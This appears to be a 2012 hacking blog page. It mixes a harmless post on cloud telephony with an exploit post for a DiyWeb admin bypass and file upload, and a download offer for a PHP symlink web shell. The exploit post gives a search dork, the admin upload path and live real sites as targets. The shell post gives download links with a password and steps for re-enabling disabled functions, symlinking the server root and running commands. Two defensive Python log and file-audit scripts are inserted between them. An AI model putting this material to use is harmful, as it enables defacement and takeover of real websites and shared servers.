Wednesday, September 26, 2012

Cloudy with a chance of phone calls!

It’s not every day that you can report savings thanks to a cloud, but that’s exactly what’s possible if you look into various new phone systems technologies for your workplace.
One of the most popular methods of making savings on existing phone systems is by reducing revenue costs on multiple analogue exchange lines and replacing this requirement with a single data link into each office that requires telephony.

How to use just digital links

Within the UK, many businesses and public sector organizations such as schools and hospitals run on archaic equipment that is dependent on analogue copper lines into the building. One of the main reasons why so many organizations still use these analogue phone systems is due to their reliability; however, many analogue phone switches are now finally approaching their end of life, and a lot of organizations are being forced into looking for alternatives.
Phone systems providers such as Siemens Enterprise Communications, Meridian and Mitel have all produced PABXs, Hi-Paths and other analogue phone switches that used to rely on multiple analogue lines to handle high volumes of incoming calls into a single phone number.
With the introduction of multi-channel fibre ISDN lines, the associated high revenue costs can now be safely reduced by replacing 30 analogue lines with a single fibre line instead.

What system is best placed to use a digital link?

Whilst existing analogue phone switches can be upgraded to accept incoming multi-channel ISDN connections, with the support of these switches approaching their expiration (2017 for Siemens PABX switches) and the reliability of the systems also being called into question, an IP based phone system is clearly the way to go.

So how can you make use of the cloud?

Firstly, for those that don’t know, the cloud is a term used for something which is stored online. Cloud-based technologies can be applied to anything related to IT, not just phone systems, and all have a common theme: data and services aren’t stored in your local office, but are accessed online via an internet connection and, therefore, a data link.
Once you’ve decommissioned those thousands of pounds worth of analogue phone lines, you’ll have plenty of spare revenue to invest in IPT Telephony systems capable of contacting cloud based services such as virtual operators, call recording, voice mail facilities, call usage stats etc.
Whilst the majority of IPT technologies rely on a locally based phone switch for many of the aforementioned functions, the cloud can save you money by effectively leasing these services over your data link.

Saturday, September 15, 2012

DiyWeb Admin Bypass and Remote file/shell Upload exploit

Hi guys, hope you are well. We are back on our old topic after a long time! Enjoy the new exploit, and please share your views and share our links on Facebook, Twitter etc. Thanks!
Now to work. Our new exploit is the DiyWeb admin bypass. With this vulnerability we can upload our shell, deface pages, and files by bypassing the admin login panel.
Exploit title : DiyWeb Admin Bypass and File Upload exploit
Discovered by : NoentryPhc
Server : Windows
Type : web application
Shell extension : .asp


Dork : "Power by DiyWeb" 
            inurl:/template.asp?menuid=
PoC : diyweb/menu/admin/image_manager.asp
Almost all websites vulnerable to this exploit are Malaysian.
To upload your files go to : http://www.website.com/diyweb/menu/admin/image_manager.asp
and upload your shell/deface there!
If the .php extension is not allowed, then you can try Tamper Data and Live HTTP Headers.
To access your file go to : http://www.website.com/Images/yourfilehere and sometimes you have to find it manually on the website.
Live Demo : 
http://otgmalaysia.com/diyweb/menu/admin/image_manager.asp
http://www.famosapadu.com.my/diyweb/menu/admin/image_manager.asp

Find more using the Google dork :) Thanks for reading. Please share this post on Facebook and other social networks.
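
For site owners running DiyWeb, the behaviour described in this post leaves two traces in the IIS access log: a POST to the image manager page, and later requests for script files under /Images/. The following is an added example, not part of the original post, that parses W3C-format log lines and flags both; the sample log is constructed, and every extension in the list other than .asp is an assumption.

```python
from urllib.parse import unquote

# Paths taken from the post; extensions other than .asp are assumptions.
UPLOAD_PAGE = "/diyweb/menu/admin/image_manager.asp"
UPLOAD_DIR = "/images/"
SCRIPT_EXTS = (".asp", ".asa", ".cer", ".aspx", ".php")

# Constructed sample log (documentation IP ranges), not from a real server.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 7.5
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2012-09-15 10:01:02 198.51.100.7 GET /template.asp menuid=3 200
2012-09-15 10:02:10 203.0.113.9 GET /diyweb/menu/admin/image_manager.asp - 200
2012-09-15 10:02:31 203.0.113.9 POST /diyweb/menu/admin/image_manager.asp - 200
2012-09-15 10:03:05 203.0.113.9 GET /Images/logo.jpg - 200
2012-09-15 10:03:40 203.0.113.9 GET /Images/x.ASP - 200
2012-09-15 10:04:00 198.51.100.7 GET /Images/banner.png - 304
"""


def parse_w3c(text):
    """Yield one dict per request, named by the #Fields directive."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            values = line.split()
            if len(values) == len(fields):  # skip truncated lines
                yield dict(zip(fields, values))


def find_suspicious(text):
    """Return (reason, client_ip, path) tuples for requests worth triage."""
    hits = []
    for row in parse_w3c(text):
        # IIS paths are case-insensitive, so compare in lower case.
        path = unquote(row["cs-uri-stem"]).lower()
        if path == UPLOAD_PAGE and row["cs-method"] == "POST":
            hits.append(("upload-page-post", row["c-ip"], path))
        elif path.startswith(UPLOAD_DIR) and path.endswith(SCRIPT_EXTS):
            hits.append(("script-in-upload-dir", row["c-ip"], path))
    return hits


if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_LOG):
        print(*hit)
```

Any hit of the second kind means a script file is being served from a directory meant for images, so the file itself should be pulled for analysis and script execution disabled for that directory.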



Free Download "MANNU php Symlink shell" with Graphical User Interface

MANNU Shell is a GUI-based symlink PHP shell.
Download the shell from this link:
 http://www.mediafire.com/?dfn61sm88n1ve1q
Download v 2.0 (password Protected)
http://www.mediafire.com/?6t7np02j7g30hc4

  • username team
  • password indishell


This script basically contains the following functions:

1. Generate php.ini file :-
  Creates a php.ini file, which helps us enable the disabled functions so that we can execute commands.
2. Symlink the ROOT directory :-
  This option symlinks the "/" directory (root directory) and gives a hyperlink to the directory where the symlink was created.
3. CMS-based symlink :-
  This option provides a direct link for a CMS such as Joomla or WordPress, or you can get a hyperlink to the public_html directory just by providing the website username (once we are done with the second option).
4. Website and username :-
  This function lists the websites hosted on the server with their usernames.
5. Username function :-
  In case /etc/named.conf has no read permission for listing the server's websites, just provide the website name and press Enter to get the username of the website.
6. Command execution :-
  You can run commands from this input box.

First of all, click on the "generate php.ini" hyperlink (to enable all the functions on the server). The shell will show a hyperlink which we need to open in a new tab, and this process will enable the disabled functions.
The second step is to click on the "symlink the root folder" hyperlink to check whether the server is vulnerable to symlinking. When we click on this option, the shell will show a hyperlink to the "root" directory symlink. Open it in a new tab; if we don't get a 404 error, it means the symlink has been created.
Now you can use the third and sixth options.
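
On a shared host, the first two steps above leave artifacts inside the account's web root: a php.ini that empties `disable_functions`, and a symlink that resolves outside the web root. The following is an added example, not part of the original post or of the shell, that audits one web root for both; `build_demo_tree` is a hypothetical helper that creates a constructed sample tree in a temporary directory.

```python
import os
import tempfile


def clears_disable_functions(path):
    """True if the ini file sets disable_functions to an empty value."""
    with open(path, errors="replace") as fh:
        for line in fh:
            # Drop ';' comments, then split "key = value".
            key, sep, value = line.split(";", 1)[0].partition("=")
            if sep and key.strip().lower() == "disable_functions":
                if value.strip().strip('"') == "":
                    return True
    return False


def audit_docroot(docroot):
    """Return sorted (finding, relative_path) pairs for one web root."""
    root = os.path.realpath(docroot)
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):  # links not followed
        for name in dirnames + filenames:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root)
            if os.path.islink(full):
                target = os.path.realpath(full)
                # Flag links that resolve outside the web root ("/" in the post).
                if os.path.commonpath([root, target]) != root:
                    findings.append(("symlink-escapes-docroot", rel))
            elif name.lower() == "php.ini" and clears_disable_functions(full):
                findings.append(("php.ini-clears-disable_functions", rel))
    return sorted(findings)


def build_demo_tree():
    """Constructed sample: one escaping link, one harmless link, one php.ini."""
    root = tempfile.mkdtemp(prefix="docroot-")
    os.mkdir(os.path.join(root, "img"))
    os.symlink("/", os.path.join(root, "sym"))                       # escapes
    os.symlink(os.path.join(root, "img"), os.path.join(root, "i"))   # stays inside
    with open(os.path.join(root, "php.ini"), "w") as fh:
        fh.write("; constructed sample\ndisable_functions =\n")
    return root


if __name__ == "__main__":
    for finding in audit_docroot(build_demo_tree()):
        print(*finding)
```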

DISCLAIMER

The information provided on hottechtips.blogspot.com is to be used for educational purposes only. The website creator is in no way responsible for any misuse of the information provided. All of the information in this website is meant to help the reader develop a hacker defense attitude in order to prevent the attacks discussed. In no way should you use the information to cause any kind of damage directly or indirectly. The word “Hack” or “Hacking” on hottechtips.blogspot.com should be regarded as “Ethical Hack” or “Ethical hacking” respectively. You implement the information given at your own risk.